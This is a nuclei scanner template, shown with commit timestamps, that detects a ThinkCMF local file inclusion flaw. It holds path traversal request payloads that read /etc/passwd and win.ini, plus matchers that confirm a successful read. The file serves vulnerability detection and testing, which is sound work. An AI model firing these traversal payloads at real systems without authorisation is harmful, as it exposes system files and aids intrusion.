nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml

27 lines
598 B
YAML
Raw Normal View History

2021-02-11 15:46:20 +00:00
id: thinkcmf-lfi
info:
name: ThinkCMF LFI
author: pikpikcu
severity: high
reference: https://www.freebuf.com/vuls/217586.html
2021-02-11 16:53:14 +00:00
tags: thinkcmf,lfi
2021-02-11 15:46:20 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"
matchers-condition: and
matchers:
2021-02-12 04:59:05 +00:00
2021-02-11 15:46:20 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-02-25 18:08:40 +00:00
- "bit app support"
2021-02-11 15:46:20 +00:00
- type: status
status:
- 200